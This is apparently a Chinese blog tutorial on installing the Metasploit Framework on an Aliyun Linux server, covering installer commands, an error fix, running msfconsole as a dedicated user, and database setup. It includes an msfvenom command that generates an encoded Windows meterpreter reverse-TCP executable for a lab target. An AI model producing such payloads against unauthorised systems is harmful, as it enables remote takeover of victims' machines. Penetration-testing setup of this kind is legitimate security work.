linux系统如何安装msf
更新:HHH   时间:2023-1-7


这篇文章将为大家详细讲解有关linux系统如何安装msf,小编觉得挺实用的,因此分享给大家做个参考,希望大家阅读完这篇文章后可以有所收获。

我的服务器系统是 Aliyun linux

1、下载安装
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall

可能报错:Couldn’t open file /etc/pki/rpm-gpg/RPM-GPG-KEY-Metasploit

是因为安装库的问题!
解决方法:
yum install -y epel-release
然后再重复上面那条命令!

2、添加新用户运行msf
adduser msf       #添加msf用户
su msf                #切换到msf用户
cd  /opt/metasploit-framework/bin   #切换到msf所在的目录
./msfconsole
#以后启动msfconsole,都切换到msf用户下启动,这样会同步数据库。
如果使用root用户启动的话,不会同步数据库!
(启动索引已经默认配好了!)
直接 msfconsole 就可以启动了!

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
#相关命令
[msf@xxxx root]$ msf
msfbinscan msfconsole msfd   msfdb 
msfelfscan msfmachscan msfpescan msfrop 
msfrpc  msfrpcd  msfupdate msfvenom
#数据库初始化
[msf@xxxx root]$ msfdb
Commands:
 init  initialize the component
 reinit delete and reinitialize the component
 delete delete and stop the component
 status check component status
 start start the component
 stop  stop the component
 restart restart the component
1
2
3
4
5
#测试:
e.g.我的虚拟主机是 Win2003(目标机)
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp
LHOST=msf_ip
LPORT=4444 -e x86/shikata_ga_nai -f exe > test.exe

注:如果是弹性云服务器IP,LHOST 要设置为内网分配IP,不能设公网IP [被这个坑折腾好久!!!吐血!!!]

ps:linux系统下安装msf框架

命令:

1
2
3
wget http://downloads.metasploit.com/data/releases/metasploit-latest-linux-installer.run
chmod 755 metasploit-latest-linux-installer.run
./metasploit-latest-linux-installer.run

等待运行结束即可。关键地方按回车和Y即可。

关于“linux系统如何安装msf”这篇文章就分享到这里了,希望以上内容可以对大家有一定的帮助,使各位可以学到更多知识,如果觉得文章不错,请把它分享出去让更多的人看到。

返回开发技术教程...